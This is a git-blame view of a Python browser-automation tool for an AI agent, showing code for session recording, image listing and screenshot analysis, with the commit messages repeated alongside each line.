## Tests
21 new tests covering:
- browser_console message/error parsing, clear flag, empty/failed states
- browser_console schema registration
- browser_vision annotate schema and flag passing
- record_sessions config defaults and recording lifecycle
- Dogfood skill file existence and content validation
Addresses #315.
2026-03-08 21:02:14 -07:00
timestamp = time . strftime ( " % Y % m %d _ % H % M % S " )
2026-03-14 11:34:31 -07:00
recording_path = recordings_dir / f " session_ { timestamp } _ { task_id [ : 16 ] } .webm "
result = _run_browser_command ( task_id , " record " , [ " start " , str ( recording_path ) ] )
feat: browser console/errors tool, annotated screenshots, auto-recording, and dogfood QA skill
New browser capabilities and a built-in skill for agent-driven web QA.
## New tool: browser_console
Returns console messages (log/warn/error/info) AND uncaught JavaScript
exceptions in a single call. Uses agent-browser's 'console' and 'errors'
commands through the existing session plumbing. Supports --clear to reset
buffers. Verified working in both local and Browserbase cloud modes.
## Enhanced tool: browser_vision(annotate=True)
New boolean parameter on browser_vision. When true, agent-browser overlays
numbered [N] labels on interactive elements — each [N] maps to ref @eN.
Annotation data (element name, role, bounding box) returned alongside the
vision analysis. Useful for QA reports and spatial reasoning.
## Config: browser.record_sessions
Auto-record browser sessions as WebM video files when enabled:
- Starts recording on first browser_navigate
- Stops and saves on browser_close
- Saves to ~/.hermes/browser_recordings/
- Works in both local and cloud modes (verified)
- Disabled by default
## Built-in skill: dogfood
Systematic exploratory QA testing for web applications. Teaches the agent
a 5-phase workflow:
1. Plan — accept URL, create output dirs, set scope
2. Explore — systematic crawl with annotated screenshots
3. Collect Evidence — screenshots, console errors, JS exceptions
4. Categorize — severity (Critical/High/Medium/Low) and category
(Functional/Visual/Accessibility/Console/UX/Content)
5. Report — structured markdown with per-issue evidence
Includes:
- skills/dogfood/SKILL.md — full workflow instructions
- skills/dogfood/references/issue-taxonomy.md — severity/category defs
- skills/dogfood/templates/dogfood-report-template.md — report template
## Tests
21 new tests covering:
- browser_console message/error parsing, clear flag, empty/failed states
- browser_console schema registration
- browser_vision annotate schema and flag passing
- record_sessions config defaults and recording lifecycle
- Dogfood skill file existence and content validation
Addresses #315.
2026-03-08 21:02:14 -07:00
if result . get ( " success " ) :
fix(browser): hardening — dead code, caching, scroll perf, security, thread safety
Salvaged from PR #7276 (hardening-only subset; excluded 6 new tools
and unrelated scope additions from the contributor's commit).
- Remove dead DEFAULT_SESSION_TIMEOUT and unregistered browser_close schema
- Fix _camofox_eval wrong call signatures (_ensure_tab, _post args)
- Cache _find_agent_browser, _get_command_timeout, _discover_homebrew_node_dirs
- Replace 5x subprocess scroll loop with single pixel-arg call
- URL-decode before secret exfiltration check (bypass prevention)
- Protect _recording_sessions with _cleanup_lock (thread safety)
- Return failure on empty stdout instead of silent success
- Structure-aware _truncate_snapshot (cut at line boundaries)
Follow-up improvements over contributor's original:
- Move _EMPTY_OK_COMMANDS to module-level frozenset (avoid per-call allocation)
- Fix list+tuple concat in _run_browser_command PATH construction
- Update test_browser_homebrew_paths.py for tuple returns and cache fixtures
Co-authored-by: kshitijk4poor <82637225+kshitijk4poor@users.noreply.github.com>
Closes #7168, closes #7171, closes #7172, closes #7173
2026-04-10 13:00:23 -07:00
with _cleanup_lock :
_recording_sessions . add ( task_id )
2026-03-14 11:34:31 -07:00
logger . info ( " Auto-recording browser session %s to %s " , task_id , recording_path )
feat: browser console/errors tool, annotated screenshots, auto-recording, and dogfood QA skill
New browser capabilities and a built-in skill for agent-driven web QA.
## New tool: browser_console
Returns console messages (log/warn/error/info) AND uncaught JavaScript
exceptions in a single call. Uses agent-browser's 'console' and 'errors'
commands through the existing session plumbing. Supports --clear to reset
buffers. Verified working in both local and Browserbase cloud modes.
## Enhanced tool: browser_vision(annotate=True)
New boolean parameter on browser_vision. When true, agent-browser overlays
numbered [N] labels on interactive elements — each [N] maps to ref @eN.
Annotation data (element name, role, bounding box) returned alongside the
vision analysis. Useful for QA reports and spatial reasoning.
## Config: browser.record_sessions
Auto-record browser sessions as WebM video files when enabled:
- Starts recording on first browser_navigate
- Stops and saves on browser_close
- Saves to ~/.hermes/browser_recordings/
- Works in both local and cloud modes (verified)
- Disabled by default
## Built-in skill: dogfood
Systematic exploratory QA testing for web applications. Teaches the agent
a 5-phase workflow:
1. Plan — accept URL, create output dirs, set scope
2. Explore — systematic crawl with annotated screenshots
3. Collect Evidence — screenshots, console errors, JS exceptions
4. Categorize — severity (Critical/High/Medium/Low) and category
(Functional/Visual/Accessibility/Console/UX/Content)
5. Report — structured markdown with per-issue evidence
Includes:
- skills/dogfood/SKILL.md — full workflow instructions
- skills/dogfood/references/issue-taxonomy.md — severity/category defs
- skills/dogfood/templates/dogfood-report-template.md — report template
## Tests
21 new tests covering:
- browser_console message/error parsing, clear flag, empty/failed states
- browser_console schema registration
- browser_vision annotate schema and flag passing
- record_sessions config defaults and recording lifecycle
- Dogfood skill file existence and content validation
Addresses #315.
2026-03-08 21:02:14 -07:00
else :
2026-03-14 11:34:31 -07:00
logger . debug ( " Could not start auto-recording: %s " , result . get ( " error " ) )
feat: browser console/errors tool, annotated screenshots, auto-recording, and dogfood QA skill
New browser capabilities and a built-in skill for agent-driven web QA.
## New tool: browser_console
Returns console messages (log/warn/error/info) AND uncaught JavaScript
exceptions in a single call. Uses agent-browser's 'console' and 'errors'
commands through the existing session plumbing. Supports --clear to reset
buffers. Verified working in both local and Browserbase cloud modes.
## Enhanced tool: browser_vision(annotate=True)
New boolean parameter on browser_vision. When true, agent-browser overlays
numbered [N] labels on interactive elements — each [N] maps to ref @eN.
Annotation data (element name, role, bounding box) returned alongside the
vision analysis. Useful for QA reports and spatial reasoning.
## Config: browser.record_sessions
Auto-record browser sessions as WebM video files when enabled:
- Starts recording on first browser_navigate
- Stops and saves on browser_close
- Saves to ~/.hermes/browser_recordings/
- Works in both local and cloud modes (verified)
- Disabled by default
## Built-in skill: dogfood
Systematic exploratory QA testing for web applications. Teaches the agent
a 5-phase workflow:
1. Plan — accept URL, create output dirs, set scope
2. Explore — systematic crawl with annotated screenshots
3. Collect Evidence — screenshots, console errors, JS exceptions
4. Categorize — severity (Critical/High/Medium/Low) and category
(Functional/Visual/Accessibility/Console/UX/Content)
5. Report — structured markdown with per-issue evidence
Includes:
- skills/dogfood/SKILL.md — full workflow instructions
- skills/dogfood/references/issue-taxonomy.md — severity/category defs
- skills/dogfood/templates/dogfood-report-template.md — report template
## Tests
21 new tests covering:
- browser_console message/error parsing, clear flag, empty/failed states
- browser_console schema registration
- browser_vision annotate schema and flag passing
- record_sessions config defaults and recording lifecycle
- Dogfood skill file existence and content validation
Addresses #315.
2026-03-08 21:02:14 -07:00
except Exception as e :
logger . debug ( " Auto-recording setup failed: %s " , e )
def _maybe_stop_recording ( task_id : str ) :
""" Stop recording if one is active for this session. """
fix(browser): hardening — dead code, caching, scroll perf, security, thread safety
Salvaged from PR #7276 (hardening-only subset; excluded 6 new tools
and unrelated scope additions from the contributor's commit).
- Remove dead DEFAULT_SESSION_TIMEOUT and unregistered browser_close schema
- Fix _camofox_eval wrong call signatures (_ensure_tab, _post args)
- Cache _find_agent_browser, _get_command_timeout, _discover_homebrew_node_dirs
- Replace 5x subprocess scroll loop with single pixel-arg call
- URL-decode before secret exfiltration check (bypass prevention)
- Protect _recording_sessions with _cleanup_lock (thread safety)
- Return failure on empty stdout instead of silent success
- Structure-aware _truncate_snapshot (cut at line boundaries)
Follow-up improvements over contributor's original:
- Move _EMPTY_OK_COMMANDS to module-level frozenset (avoid per-call allocation)
- Fix list+tuple concat in _run_browser_command PATH construction
- Update test_browser_homebrew_paths.py for tuple returns and cache fixtures
Co-authored-by: kshitijk4poor <82637225+kshitijk4poor@users.noreply.github.com>
Closes #7168, closes #7171, closes #7172, closes #7173
2026-04-10 13:00:23 -07:00
with _cleanup_lock :
if task_id not in _recording_sessions :
return
feat: browser console/errors tool, annotated screenshots, auto-recording, and dogfood QA skill
New browser capabilities and a built-in skill for agent-driven web QA.
## New tool: browser_console
Returns console messages (log/warn/error/info) AND uncaught JavaScript
exceptions in a single call. Uses agent-browser's 'console' and 'errors'
commands through the existing session plumbing. Supports --clear to reset
buffers. Verified working in both local and Browserbase cloud modes.
## Enhanced tool: browser_vision(annotate=True)
New boolean parameter on browser_vision. When true, agent-browser overlays
numbered [N] labels on interactive elements — each [N] maps to ref @eN.
Annotation data (element name, role, bounding box) returned alongside the
vision analysis. Useful for QA reports and spatial reasoning.
## Config: browser.record_sessions
Auto-record browser sessions as WebM video files when enabled:
- Starts recording on first browser_navigate
- Stops and saves on browser_close
- Saves to ~/.hermes/browser_recordings/
- Works in both local and cloud modes (verified)
- Disabled by default
## Built-in skill: dogfood
Systematic exploratory QA testing for web applications. Teaches the agent
a 5-phase workflow:
1. Plan — accept URL, create output dirs, set scope
2. Explore — systematic crawl with annotated screenshots
3. Collect Evidence — screenshots, console errors, JS exceptions
4. Categorize — severity (Critical/High/Medium/Low) and category
(Functional/Visual/Accessibility/Console/UX/Content)
5. Report — structured markdown with per-issue evidence
Includes:
- skills/dogfood/SKILL.md — full workflow instructions
- skills/dogfood/references/issue-taxonomy.md — severity/category defs
- skills/dogfood/templates/dogfood-report-template.md — report template
## Tests
21 new tests covering:
- browser_console message/error parsing, clear flag, empty/failed states
- browser_console schema registration
- browser_vision annotate schema and flag passing
- record_sessions config defaults and recording lifecycle
- Dogfood skill file existence and content validation
Addresses #315.
2026-03-08 21:02:14 -07:00
try :
result = _run_browser_command ( task_id , " record " , [ " stop " ] )
if result . get ( " success " ) :
path = result . get ( " data " , { } ) . get ( " path " , " " )
2026-03-14 11:34:31 -07:00
logger . info ( " Saved browser recording for session %s : %s " , task_id , path )
feat: browser console/errors tool, annotated screenshots, auto-recording, and dogfood QA skill
New browser capabilities and a built-in skill for agent-driven web QA.
## New tool: browser_console
Returns console messages (log/warn/error/info) AND uncaught JavaScript
exceptions in a single call. Uses agent-browser's 'console' and 'errors'
commands through the existing session plumbing. Supports --clear to reset
buffers. Verified working in both local and Browserbase cloud modes.
## Enhanced tool: browser_vision(annotate=True)
New boolean parameter on browser_vision. When true, agent-browser overlays
numbered [N] labels on interactive elements — each [N] maps to ref @eN.
Annotation data (element name, role, bounding box) returned alongside the
vision analysis. Useful for QA reports and spatial reasoning.
## Config: browser.record_sessions
Auto-record browser sessions as WebM video files when enabled:
- Starts recording on first browser_navigate
- Stops and saves on browser_close
- Saves to ~/.hermes/browser_recordings/
- Works in both local and cloud modes (verified)
- Disabled by default
## Built-in skill: dogfood
Systematic exploratory QA testing for web applications. Teaches the agent
a 5-phase workflow:
1. Plan — accept URL, create output dirs, set scope
2. Explore — systematic crawl with annotated screenshots
3. Collect Evidence — screenshots, console errors, JS exceptions
4. Categorize — severity (Critical/High/Medium/Low) and category
(Functional/Visual/Accessibility/Console/UX/Content)
5. Report — structured markdown with per-issue evidence
Includes:
- skills/dogfood/SKILL.md — full workflow instructions
- skills/dogfood/references/issue-taxonomy.md — severity/category defs
- skills/dogfood/templates/dogfood-report-template.md — report template
## Tests
21 new tests covering:
- browser_console message/error parsing, clear flag, empty/failed states
- browser_console schema registration
- browser_vision annotate schema and flag passing
- record_sessions config defaults and recording lifecycle
- Dogfood skill file existence and content validation
Addresses #315.
2026-03-08 21:02:14 -07:00
except Exception as e :
logger . debug ( " Could not stop recording for %s : %s " , task_id , e )
finally :
fix(browser): hardening — dead code, caching, scroll perf, security, thread safety
Salvaged from PR #7276 (hardening-only subset; excluded 6 new tools
and unrelated scope additions from the contributor's commit).
- Remove dead DEFAULT_SESSION_TIMEOUT and unregistered browser_close schema
- Fix _camofox_eval wrong call signatures (_ensure_tab, _post args)
- Cache _find_agent_browser, _get_command_timeout, _discover_homebrew_node_dirs
- Replace 5x subprocess scroll loop with single pixel-arg call
- URL-decode before secret exfiltration check (bypass prevention)
- Protect _recording_sessions with _cleanup_lock (thread safety)
- Return failure on empty stdout instead of silent success
- Structure-aware _truncate_snapshot (cut at line boundaries)
Follow-up improvements over contributor's original:
- Move _EMPTY_OK_COMMANDS to module-level frozenset (avoid per-call allocation)
- Fix list+tuple concat in _run_browser_command PATH construction
- Update test_browser_homebrew_paths.py for tuple returns and cache fixtures
Co-authored-by: kshitijk4poor <82637225+kshitijk4poor@users.noreply.github.com>
Closes #7168, closes #7171, closes #7172, closes #7173
2026-04-10 13:00:23 -07:00
with _cleanup_lock :
_recording_sessions . discard ( task_id )
feat: browser console/errors tool, annotated screenshots, auto-recording, and dogfood QA skill
New browser capabilities and a built-in skill for agent-driven web QA.
## New tool: browser_console
Returns console messages (log/warn/error/info) AND uncaught JavaScript
exceptions in a single call. Uses agent-browser's 'console' and 'errors'
commands through the existing session plumbing. Supports --clear to reset
buffers. Verified working in both local and Browserbase cloud modes.
## Enhanced tool: browser_vision(annotate=True)
New boolean parameter on browser_vision. When true, agent-browser overlays
numbered [N] labels on interactive elements — each [N] maps to ref @eN.
Annotation data (element name, role, bounding box) returned alongside the
vision analysis. Useful for QA reports and spatial reasoning.
## Config: browser.record_sessions
Auto-record browser sessions as WebM video files when enabled:
- Starts recording on first browser_navigate
- Stops and saves on browser_close
- Saves to ~/.hermes/browser_recordings/
- Works in both local and cloud modes (verified)
- Disabled by default
## Built-in skill: dogfood
Systematic exploratory QA testing for web applications. Teaches the agent
a 5-phase workflow:
1. Plan — accept URL, create output dirs, set scope
2. Explore — systematic crawl with annotated screenshots
3. Collect Evidence — screenshots, console errors, JS exceptions
4. Categorize — severity (Critical/High/Medium/Low) and category
(Functional/Visual/Accessibility/Console/UX/Content)
5. Report — structured markdown with per-issue evidence
Includes:
- skills/dogfood/SKILL.md — full workflow instructions
- skills/dogfood/references/issue-taxonomy.md — severity/category defs
- skills/dogfood/templates/dogfood-report-template.md — report template
## Tests
21 new tests covering:
- browser_console message/error parsing, clear flag, empty/failed states
- browser_console schema registration
- browser_vision annotate schema and flag passing
- record_sessions config defaults and recording lifecycle
- Dogfood skill file existence and content validation
Addresses #315.
2026-03-08 21:02:14 -07:00
2026-01-29 06:10:24 +00:00
def browser_get_images ( task_id : Optional [ str ] = None ) - > str :
"""
Get all images on the current page .
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
Args :
task_id : Task identifier for session isolation
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
Returns :
JSON string with list of images ( src and alt )
"""
feat(browser): add Camofox local anti-detection browser backend (#4008)
Camofox-browser is a self-hosted Node.js server wrapping Camoufox
(Firefox fork with C++ fingerprint spoofing). When CAMOFOX_URL is set,
all 11 browser tools route through the Camofox REST API instead of
the agent-browser CLI.
Maps 1:1 to the existing browser tool interface:
- Navigate, snapshot, click, type, scroll, back, press, close
- Get images, vision (screenshot + LLM analysis)
- Console (returns empty with note — camofox limitation)
Setup: npm start in camofox-browser dir, or docker run -p 9377:9377
Then: CAMOFOX_URL=http://localhost:9377 in ~/.hermes/.env
Advantages over Browserbase (cloud):
- Free (no per-session API costs)
- Local (zero network latency for browser ops)
- Anti-detection at C++ level (bypasses Cloudflare/Google bot detection)
- Works offline, Docker-ready
Files:
- tools/browser_camofox.py: Full REST backend (~400 lines)
- tools/browser_tool.py: Routing at each tool function
- hermes_cli/config.py: CAMOFOX_URL env var entry
- tests/tools/test_browser_camofox.py: 20 tests
2026-03-30 13:18:42 -07:00
if _is_camofox_mode ( ) :
from tools . browser_camofox import camofox_get_images
return camofox_get_images ( task_id )
feat(browser): auto-spawn local Chromium for LAN/localhost URLs in cloud mode (#16136)
When a cloud browser provider (Browserbase / Browser-Use / Firecrawl) is
configured, browser_navigate now transparently spawns a local Chromium
sidecar for URLs whose host resolves to a private/loopback/LAN address
(localhost, 127.0.0.1, 192.168.x.x, 10.x.x.x, *.local, *.lan, *.internal,
::1, 169.254.x.x). Public URLs continue to use the cloud provider in the
same conversation.
Previously, setting BROWSERBASE_API_KEY / cloud_provider: browserbase
pinned the whole tool to cloud for the process — localhost URLs were
either SSRF-blocked (default) or sent to Browserbase (where they 404'd
because the cloud can't reach your LAN). Users who wanted 'cloud for
public, local for localhost' had no way to express it short of toggling
providers mid-session.
Implementation uses a composite session key scheme: the bare task_id
serves the cloud session, and a '{task_id}::local' sidecar serves the
local Chromium. _last_active_session_key[task_id] tracks which of the
two served the most recent nav so snapshot/click/fill/etc. hit the
correct one. cleanup_browser(bare_task_id) reaps both.
Feature is on by default. Opt out via:
browser:
auto_local_for_private_urls: false
The cloud provider never sees private URLs. Post-redirect SSRF guard
is preserved: redirects from public onto private addresses still block.
2026-04-26 09:57:58 -07:00
effective_task_id = _last_session_key ( task_id or " default " )
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
# Use eval to run JavaScript that extracts images
js_code = """ JSON.stringify(
[ . . . document . images ] . map ( img = > ( {
src : img . src ,
alt : img . alt | | ' ' ,
width : img . naturalWidth ,
height : img . naturalHeight
} ) ) . filter ( img = > img . src & & ! img . src . startsWith ( ' data: ' ) )
) """
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
result = _run_browser_command ( effective_task_id , " eval " , [ js_code ] )
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
if result . get ( " success " ) :
data = result . get ( " data " , { } )
raw_result = data . get ( " result " , " [] " )
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
try :
# Parse the JSON string returned by JavaScript
if isinstance ( raw_result , str ) :
images = json . loads ( raw_result )
else :
images = raw_result
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
return json . dumps ( {
" success " : True ,
" images " : images ,
" count " : len ( images )
} , ensure_ascii = False )
except json . JSONDecodeError :
return json . dumps ( {
" success " : True ,
" images " : [ ] ,
" count " : 0 ,
" warning " : " Could not parse image data "
} , ensure_ascii = False )
else :
return json . dumps ( {
" success " : False ,
" error " : result . get ( " error " , " Failed to get images " )
} , ensure_ascii = False )
feat: browser console/errors tool, annotated screenshots, auto-recording, and dogfood QA skill
New browser capabilities and a built-in skill for agent-driven web QA.
## New tool: browser_console
Returns console messages (log/warn/error/info) AND uncaught JavaScript
exceptions in a single call. Uses agent-browser's 'console' and 'errors'
commands through the existing session plumbing. Supports --clear to reset
buffers. Verified working in both local and Browserbase cloud modes.
## Enhanced tool: browser_vision(annotate=True)
New boolean parameter on browser_vision. When true, agent-browser overlays
numbered [N] labels on interactive elements — each [N] maps to ref @eN.
Annotation data (element name, role, bounding box) returned alongside the
vision analysis. Useful for QA reports and spatial reasoning.
## Config: browser.record_sessions
Auto-record browser sessions as WebM video files when enabled:
- Starts recording on first browser_navigate
- Stops and saves on browser_close
- Saves to ~/.hermes/browser_recordings/
- Works in both local and cloud modes (verified)
- Disabled by default
## Built-in skill: dogfood
Systematic exploratory QA testing for web applications. Teaches the agent
a 5-phase workflow:
1. Plan — accept URL, create output dirs, set scope
2. Explore — systematic crawl with annotated screenshots
3. Collect Evidence — screenshots, console errors, JS exceptions
4. Categorize — severity (Critical/High/Medium/Low) and category
(Functional/Visual/Accessibility/Console/UX/Content)
5. Report — structured markdown with per-issue evidence
Includes:
- skills/dogfood/SKILL.md — full workflow instructions
- skills/dogfood/references/issue-taxonomy.md — severity/category defs
- skills/dogfood/templates/dogfood-report-template.md — report template
## Tests
21 new tests covering:
- browser_console message/error parsing, clear flag, empty/failed states
- browser_console schema registration
- browser_vision annotate schema and flag passing
- record_sessions config defaults and recording lifecycle
- Dogfood skill file existence and content validation
Addresses #315.
2026-03-08 21:02:14 -07:00
def browser_vision ( question : str , annotate : bool = False , task_id : Optional [ str ] = None ) - > str :
2026-01-29 06:10:24 +00:00
"""
Take a screenshot of the current page and analyze it with vision AI .
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
This tool captures what ' s visually displayed in the browser and sends it
to Gemini for analysis . Useful for understanding visual content that the
text - based snapshot may not capture ( CAPTCHAs , verification challenges ,
images , complex layouts , etc . ) .
2026-03-14 11:34:31 -07:00
2026-03-07 22:57:05 -08:00
The screenshot is saved persistently and its file path is returned alongside
the analysis , so it can be shared with users via MEDIA : < path > in the response .
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
Args :
question : What you want to know about the page visually
feat: browser console/errors tool, annotated screenshots, auto-recording, and dogfood QA skill
New browser capabilities and a built-in skill for agent-driven web QA.
## New tool: browser_console
Returns console messages (log/warn/error/info) AND uncaught JavaScript
exceptions in a single call. Uses agent-browser's 'console' and 'errors'
commands through the existing session plumbing. Supports --clear to reset
buffers. Verified working in both local and Browserbase cloud modes.
## Enhanced tool: browser_vision(annotate=True)
New boolean parameter on browser_vision. When true, agent-browser overlays
numbered [N] labels on interactive elements — each [N] maps to ref @eN.
Annotation data (element name, role, bounding box) returned alongside the
vision analysis. Useful for QA reports and spatial reasoning.
## Config: browser.record_sessions
Auto-record browser sessions as WebM video files when enabled:
- Starts recording on first browser_navigate
- Stops and saves on browser_close
- Saves to ~/.hermes/browser_recordings/
- Works in both local and cloud modes (verified)
- Disabled by default
## Built-in skill: dogfood
Systematic exploratory QA testing for web applications. Teaches the agent
a 5-phase workflow:
1. Plan — accept URL, create output dirs, set scope
2. Explore — systematic crawl with annotated screenshots
3. Collect Evidence — screenshots, console errors, JS exceptions
4. Categorize — severity (Critical/High/Medium/Low) and category
(Functional/Visual/Accessibility/Console/UX/Content)
5. Report — structured markdown with per-issue evidence
Includes:
- skills/dogfood/SKILL.md — full workflow instructions
- skills/dogfood/references/issue-taxonomy.md — severity/category defs
- skills/dogfood/templates/dogfood-report-template.md — report template
## Tests
21 new tests covering:
- browser_console message/error parsing, clear flag, empty/failed states
- browser_console schema registration
- browser_vision annotate schema and flag passing
- record_sessions config defaults and recording lifecycle
- Dogfood skill file existence and content validation
Addresses #315.
2026-03-08 21:02:14 -07:00
annotate : If True , overlay numbered [ N ] labels on interactive elements
2026-01-29 06:10:24 +00:00
task_id : Task identifier for session isolation
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
Returns :
2026-03-07 22:57:05 -08:00
JSON string with vision analysis results and screenshot_path
2026-01-29 06:10:24 +00:00
"""
feat(browser): add Camofox local anti-detection browser backend (#4008)
Camofox-browser is a self-hosted Node.js server wrapping Camoufox
(Firefox fork with C++ fingerprint spoofing). When CAMOFOX_URL is set,
all 11 browser tools route through the Camofox REST API instead of
the agent-browser CLI.
Maps 1:1 to the existing browser tool interface:
- Navigate, snapshot, click, type, scroll, back, press, close
- Get images, vision (screenshot + LLM analysis)
- Console (returns empty with note — camofox limitation)
Setup: npm start in camofox-browser dir, or docker run -p 9377:9377
Then: CAMOFOX_URL=http://localhost:9377 in ~/.hermes/.env
Advantages over Browserbase (cloud):
- Free (no per-session API costs)
- Local (zero network latency for browser ops)
- Anti-detection at C++ level (bypasses Cloudflare/Google bot detection)
- Works offline, Docker-ready
Files:
- tools/browser_camofox.py: Full REST backend (~400 lines)
- tools/browser_tool.py: Routing at each tool function
- hermes_cli/config.py: CAMOFOX_URL env var entry
- tests/tools/test_browser_camofox.py: 20 tests
2026-03-30 13:18:42 -07:00
if _is_camofox_mode ( ) :
from tools . browser_camofox import camofox_vision
return camofox_vision ( question , annotate , task_id )
2026-01-29 06:10:24 +00:00
import base64
import uuid as uuid_mod
feat(browser): auto-spawn local Chromium for LAN/localhost URLs in cloud mode (#16136)
When a cloud browser provider (Browserbase / Browser-Use / Firecrawl) is
configured, browser_navigate now transparently spawns a local Chromium
sidecar for URLs whose host resolves to a private/loopback/LAN address
(localhost, 127.0.0.1, 192.168.x.x, 10.x.x.x, *.local, *.lan, *.internal,
::1, 169.254.x.x). Public URLs continue to use the cloud provider in the
same conversation.
Previously, setting BROWSERBASE_API_KEY / cloud_provider: browserbase
pinned the whole tool to cloud for the process — localhost URLs were
either SSRF-blocked (default) or sent to Browserbase (where they 404'd
because the cloud can't reach your LAN). Users who wanted 'cloud for
public, local for localhost' had no way to express it short of toggling
providers mid-session.
Implementation uses a composite session key scheme: the bare task_id
serves the cloud session, and a '{task_id}::local' sidecar serves the
local Chromium. _last_active_session_key[task_id] tracks which of the
two served the most recent nav so snapshot/click/fill/etc. hit the
correct one. cleanup_browser(bare_task_id) reaps both.
Feature is on by default. Opt out via:
browser:
auto_local_for_private_urls: false
The cloud provider never sees private URLs. Post-redirect SSRF guard
is preserved: redirects from public onto private addresses still block.
2026-04-26 09:57:58 -07:00
effective_task_id = _last_session_key ( task_id or " default " )
2026-03-14 11:34:31 -07:00
2026-03-07 22:57:05 -08:00
# Save screenshot to persistent location so it can be shared with users
2026-03-28 15:22:19 -07:00
from hermes_constants import get_hermes_dir
screenshots_dir = get_hermes_dir ( " cache/screenshots " , " browser_screenshots " )
2026-03-14 11:34:31 -07:00
screenshot_path = screenshots_dir / f " browser_screenshot_ { uuid_mod . uuid4 ( ) . hex } .png "
2026-01-29 06:10:24 +00:00
try :
2026-03-07 22:57:05 -08:00
screenshots_dir . mkdir ( parents = True , exist_ok = True )
2026-03-14 11:34:31 -07:00
2026-03-07 22:57:05 -08:00
# Prune old screenshots (older than 24 hours) to prevent unbounded disk growth
_cleanup_old_screenshots ( screenshots_dir , max_age_hours = 24 )
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
# Take screenshot using agent-browser
Fix browser cleanup consistency and screenshot recovery
Unify browser session teardown so manual close, inactivity cleanup, and emergency shutdown all follow the same cleanup path instead of partially duplicating logic.
This changes browser_close() to delegate to cleanup_browser(), which means recording shutdown, Browserbase release, activity bookkeeping cleanup, and local socket-directory removal now happen consistently. It also updates emergency cleanup to route through cleanup_all_browsers() and explicitly clear in-memory tracking state after teardown so stale active-session, last-activity, and recording entries are not left behind on exit.
The screenshot fallback path has also been fixed. _extract_screenshot_path_from_text() now matches real absolute PNG paths, including quoted output, so browser_vision() can recover screenshots when agent-browser emits human-readable text instead of JSON.
Regression coverage was added in tests/tools/test_browser_cleanup.py for screenshot path extraction, cleanup_browser() state removal, browser_close() delegation, and emergency cleanup state clearing.
Verified with:
- python -m pytest tests/tools/test_browser_cleanup.py -q
- python -m pytest tests/tools/test_browser_console.py tests/gateway/test_send_image_file.py -q
2026-03-12 02:49:24 +01:00
screenshot_args = [ ]
feat: browser console/errors tool, annotated screenshots, auto-recording, and dogfood QA skill
New browser capabilities and a built-in skill for agent-driven web QA.
## New tool: browser_console
Returns console messages (log/warn/error/info) AND uncaught JavaScript
exceptions in a single call. Uses agent-browser's 'console' and 'errors'
commands through the existing session plumbing. Supports --clear to reset
buffers. Verified working in both local and Browserbase cloud modes.
## Enhanced tool: browser_vision(annotate=True)
New boolean parameter on browser_vision. When true, agent-browser overlays
numbered [N] labels on interactive elements — each [N] maps to ref @eN.
Annotation data (element name, role, bounding box) returned alongside the
vision analysis. Useful for QA reports and spatial reasoning.
## Config: browser.record_sessions
Auto-record browser sessions as WebM video files when enabled:
- Starts recording on first browser_navigate
- Stops and saves on browser_close
- Saves to ~/.hermes/browser_recordings/
- Works in both local and cloud modes (verified)
- Disabled by default
## Built-in skill: dogfood
Systematic exploratory QA testing for web applications. Teaches the agent
a 5-phase workflow:
1. Plan — accept URL, create output dirs, set scope
2. Explore — systematic crawl with annotated screenshots
3. Collect Evidence — screenshots, console errors, JS exceptions
4. Categorize — severity (Critical/High/Medium/Low) and category
(Functional/Visual/Accessibility/Console/UX/Content)
5. Report — structured markdown with per-issue evidence
Includes:
- skills/dogfood/SKILL.md — full workflow instructions
- skills/dogfood/references/issue-taxonomy.md — severity/category defs
- skills/dogfood/templates/dogfood-report-template.md — report template
## Tests
21 new tests covering:
- browser_console message/error parsing, clear flag, empty/failed states
- browser_console schema registration
- browser_vision annotate schema and flag passing
- record_sessions config defaults and recording lifecycle
- Dogfood skill file existence and content validation
Addresses #315.
2026-03-08 21:02:14 -07:00
if annotate :
Fix browser cleanup consistency and screenshot recovery
Unify browser session teardown so manual close, inactivity cleanup, and emergency shutdown all follow the same cleanup path instead of partially duplicating logic.
This changes browser_close() to delegate to cleanup_browser(), which means recording shutdown, Browserbase release, activity bookkeeping cleanup, and local socket-directory removal now happen consistently. It also updates emergency cleanup to route through cleanup_all_browsers() and explicitly clear in-memory tracking state after teardown so stale active-session, last-activity, and recording entries are not left behind on exit.
The screenshot fallback path has also been fixed. _extract_screenshot_path_from_text() now matches real absolute PNG paths, including quoted output, so browser_vision() can recover screenshots when agent-browser emits human-readable text instead of JSON.
Regression coverage was added in tests/tools/test_browser_cleanup.py for screenshot path extraction, cleanup_browser() state removal, browser_close() delegation, and emergency cleanup state clearing.
Verified with:
- python -m pytest tests/tools/test_browser_cleanup.py -q
- python -m pytest tests/tools/test_browser_console.py tests/gateway/test_send_image_file.py -q
2026-03-12 02:49:24 +01:00
screenshot_args . append ( " --annotate " )
screenshot_args . append ( " --full " )
screenshot_args . append ( str ( screenshot_path ) )
2026-01-29 06:10:24 +00:00
result = _run_browser_command (
2026-03-14 11:34:31 -07:00
effective_task_id ,
" screenshot " ,
feat: browser console/errors tool, annotated screenshots, auto-recording, and dogfood QA skill
New browser capabilities and a built-in skill for agent-driven web QA.
## New tool: browser_console
Returns console messages (log/warn/error/info) AND uncaught JavaScript
exceptions in a single call. Uses agent-browser's 'console' and 'errors'
commands through the existing session plumbing. Supports --clear to reset
buffers. Verified working in both local and Browserbase cloud modes.
## Enhanced tool: browser_vision(annotate=True)
New boolean parameter on browser_vision. When true, agent-browser overlays
numbered [N] labels on interactive elements — each [N] maps to ref @eN.
Annotation data (element name, role, bounding box) returned alongside the
vision analysis. Useful for QA reports and spatial reasoning.
## Config: browser.record_sessions
Auto-record browser sessions as WebM video files when enabled:
- Starts recording on first browser_navigate
- Stops and saves on browser_close
- Saves to ~/.hermes/browser_recordings/
- Works in both local and cloud modes (verified)
- Disabled by default
## Built-in skill: dogfood
Systematic exploratory QA testing for web applications. Teaches the agent
